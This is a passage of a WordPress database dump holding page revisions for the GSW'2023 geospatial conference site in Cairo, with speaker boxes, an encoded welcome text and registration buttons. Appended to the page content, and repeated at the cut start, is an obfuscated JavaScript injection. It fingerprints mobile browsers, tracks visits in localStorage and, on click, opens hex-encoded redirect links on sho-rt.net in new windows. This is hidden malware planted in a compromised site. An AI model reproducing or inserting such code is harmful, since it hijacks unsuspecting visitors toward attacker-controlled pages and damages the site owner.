host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home','','inherit','closed','closed','','2167-revision-v1','','','2022-10-08 23:58:46','2022-10-08 23:58:46','',2167,'https://gsw2023.com/?p=2624',0,'revision','',0),
(2625,1,'2022-10-09 00:00:53','2022-10-09 00:00:53','<p>[vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}\"][vc_column parallax=\"content-moving\" offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"150\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"][/ultimate_heading][vc_row_inner css=\".vc_custom_1664994478914{margin-left: 0px !important;border-left-width: 0px !important;padding-left: 0px !important;}\"][vc_column_inner width=\"1/2\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2271|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\" img_width=\"100\" title=\"Prof. Ismail AbdelGhafar\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fweb-application-development%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></h6>\n<p>[/bsf-info-box][/vc_column_inner][vc_column_inner width=\"1/2\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2272|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\" img_width=\"100\" icon_style=\"advanced\" icon_border_spacing=\"100\" title=\"Prof. Naser El-Sheimy\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fsoftware-dedicated-team%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6>Geospatial Week Director ,The University of Calgary</h6>\n<p>[/bsf-info-box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][vc_raw_html]JTNDcCUyMHN0eWxlJTNEJTIydGV4dC1hbGlnbiUzQWp1c3RpZnklM0IlMjBjb2xvciUzQWJsYWNrJTNCJTIyJTNFQXMlMjB3ZSUyMGNlbGVicmF0ZSUyMG91ciUyMDUwdGglMjBhbm5pdmVyc2FyeSUyQyUyMHRoZSUyMEFyYWIlMjBBY2FkZW15JTIwZm9yJTIwU2NpZW5jZSUyQyUyMFRlY2hub2xvZ3klMkMlMjBhbmQlMjBNYXJpdGltZSUyMFRyYW5zcG9ydCUyMCUyOEFBU1RNVCUyOSUyMGlzJTIwaG9ub3JlZCUyMHRvJTIwaG9zdCUyMHRoZSUyMElTUFJTJTIwZmlyc3QlMjBHZW9zcGF0aWFsJTIwV2VlayUyMGluJTIwQWZyaWNhJTIwYW5kJTIwTWlkZGxlJTIwRWFzdCUyMGluJTIwMjAyMyUyMCUyOEdTVy0yMDIzJTI5JTIwdGhhdCUyMHdpbGwlMjBiZSUyMGhlbGQlMjB1bmRlciUyMHRoZSUyMGF1c3BpY2VzJTIwb2YlMjBILkUlMjBTZWNyZXRhcnktR2VuZXJhbCUyMG9mJTIwdGhlJTIwTGVhZ3VlJTIwb2YlMjBBcmFiJTIwU3RhdGVzLiUyMFRoZSUyMGNvbmZlcmVuY2UlMjB3aWxsJTIwYmUlMjBoZWxkJTIwaW4lMjBTZXB0ZW1iZXIlMjAyMDIzJTJDJTIwYXQlMjB0aGUlMjBJbnRlckNvbnRpbmVudGFsJTIwQ2Fpcm8lMjBDaXR5JTIwc3RhcnMlMjBDYWlybyUyQyUyMEVneXB0LiUyMEFBU1RNVCUyMHN0cm9uZ2x5JTIwYmVsaWV2ZXMlMjB0aGF0JTIwc2NpZW5jZSUyMGlzJTIwdGhlJTIwa2V5JTIwdG8lMjB0aGUlMjBmdXR1cmUlMjBhbmQlMjB0aGUlMjBjb3JuZXJzdG9uZSUyMGZvciUyMG5hdGlvbnMlMjclMjBwcm9ncmVzcyUyMGFuZCUyMHByb3NwZXJpdHkuJTIwSXQlMjBpcyUyMHRoZSUyMHByaW1hcnklMjBmYWN0b3IlMjBmb3IlMjBodW1hbiUyMGFjaGlldmVtZW50cyUyMHRocm91Z2hvdXQlMjBhbGwlMjBhZ2VzLiUyMEFBU1RNVCUyMGhhcyUyMGElMjBob3N0JTIwb2YlMjBxdWFsaWZpZWQlMjBwcm9mZXNzb3JzJTIwYW5kJTIwZXhwZXJ0cyUyMHdobyUyMGFyZSUyMGNhcGFibGUlMjBvZiUyMHN1cHBvcnRpbmclMjBBcmFiJTIwYW5kJTIwQWZyaWNhbiUyMGNvdW50cmllcyUyMGluJTIwdmFyaW91cyUyMHNjaWVudGlmaWMlMjBmaWVsZHMuJTIwVGhlJTIwR1NXJTIwd2lsbCUyMHByb3ZpZGUlMjBhJTIwcGxhdGZvcm0lMjBmb3IlMjBpbnRlcm5hdGlvbmFsJTIwc2Nob2xhcnMlMkMlMjBncmFkdWF0ZSUyMHN0dWRlbnRzJTJDJTIwZnV0dXJlJTIwc2NpZW50aXN0cyUyMGFuZCUyMGluZHVzdHJpYWwlMjBzZWN0b3JzJTIwdG8lMjBsZWFybiUyMGV4Y2hhbmdlJTIwa25vd2xlZGdlJTIwYW5kJTIwZXhwZXJpZW5jZXMlMjBvZiUyMGFwcGx5aW5nJTIwZ2Vvc3BhdGlhbCUyMHRlY2hub2xvZ2llcyUyMGZvciUyMHN1c3RhaW5hYmxlJTIwZGV2ZWxvcG1lbnQlMjBmb3IlMjBiZXR0ZXIlMjBxdWFsaXR5JTIwb2YlMjBsaWZlJTIwZm9yJTIwcGVvcGxlJTIwYXJvdW5kJTIwdGhlJTIwd29ybGQuJTIwV2UlMjB3b3VsZCUyMGxpa2UlMjB0byUyMHRha2UlMjB0aGlzJTIwb3Bwb3J0dW5pdHklMjB0byUyMHdlbGNvbWUlMjB5b3UlMjB0byUyMENhaXJvJTIwYSUyMHZpYnJhbnQlMkMlMjBleGhpbGFyYXRpbmclMkMlMjBleG90aWMlMkMlMjBmYXNjaW5hdGluZyUyMGFuZCUyMHdlbGNvbWluZyUyMGNpdHkuJTIwSG9tZSUyMHRvJTIwdGhlJTIwYmVzdCUyMFBoYXJhb25pYyUyQyUyMENvcHRpYyUyMGFuZCUyMElzbGFtaWMlMjBzaWdodHMlMjBpbiUyMEVneXB0LiUyMENhaXJvJTIwaXMlMjB3aGVyZSUyMHlvdSUyMG5ldmVyJTIwa25vdyUyMHdoYXQlMjBpbmNyZWRpYmxlJTJDJTIwaGFsZi1mb3Jnb3R0ZW4lMjBtb251bWVudCUyMHlvdSUyMG1pZ2h0JTIwc3R1bWJsZSUyMGFjcm9zcyUyMHdoaWxlJTIwd2FuZGVyaW5nJTIwYXJvdW5kLiUyMEVuam95JTIwdGhlJTIwTmlsZSUyMHZpZXclMkMlMjB2aXNpdCUyMHRoZSUyMGdyZWF0JTIwcHlyYW1pZHMlMjBvZiUyMEdpemElMkMlMjB3YWxrJTIwdGhyb3VnaCUyMHRoZSUyMGNhcGl0YWwlMjdzJTIwbWVkaWV2YWwlMjBtYXJrZXRzJTIwYnklMjBLaGFuJTIwRWwtS2hhbGlsaSUyQyUyMG9yJTIwd2FsayUyMGRvd24lMjB0aGUlMjBOaWxlJTIwcHJvbWVuYWRlLiUyMFdlJTIwbG9vayUyMGZvcndhcmQlMjB0byUyMHdvcmtpbmclMjB3aXRoJTIwdGhlJTIwSVNQUlMlMjBjb3VuY2lsJTJDJTIwY29tbWlzc2lvbnMlMjBwcmVzaWRlbnRzJTJDJTIwd29ya2luZyUyMGdyb3VwJTIwb2ZmaWNlcnMlMkMlMjBhbmQlMjBvdGhlciUyMHNpc3RlciUyMG9yZ2FuaXphdGlvbnMlMjB0byUyMGhhdmUlMjBhJTIwc3VjY2Vzc2Z1bCUyMHRlY2huaWNhbCUyMHByb2dyYW0lMjBhbmQlMjBhJTIwbWVtb3JhYmxlJTIwc29jaWFsJTIwcHJvZ3JhbS4lMjBJdCUyMGlzJTIwZ3JlYXQlMjB0byUyMGhhdmUlMjB0aGUlMjBHU1clMjBjb21pbmclMjB0byUyMEVneXB0JTIwd2hlcmUlMjBtb3N0JTIwcHJvYmFibHklMjB0aGUlMjBmaXJzdCUyMG1hcHBpbmclMjBzeXN0ZW1zJTIwd2VyZSUyMGRldmVsb3BlZCUyMDEwMDBzJTIweWVhcnMlMjBhZ28uJTIwV2VsY29tZSUyMHRvJTIwR1NXJTI3MjAyMyUyMGluJTIwQ2Fpcm8lMkMlMjBFZ3lwdC4lM0MlMkZwJTNF[/vc_raw_html][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fm.gsw2023.com%2Fpages%2Fregistration.html\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182820572{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665273584331{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #F2EAD0), color-stop(95%, #F2EAD0));background: -moz-linear-gradient(left,#F2EAD0 10%,#F2EAD0 95%);background: -webkit-linear-gradient(left,#F2EAD0 10%,#F2EAD0 95%);background: -o-linear-gradient(left,#F2EAD0 10%,#F2EAD0 95%);background: -ms-linear-gradient(left,#F2EAD0 10%,#F2EAD0 95%);background: linear-gradient(left,#F2EAD0 10%,#F2EAD0 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return 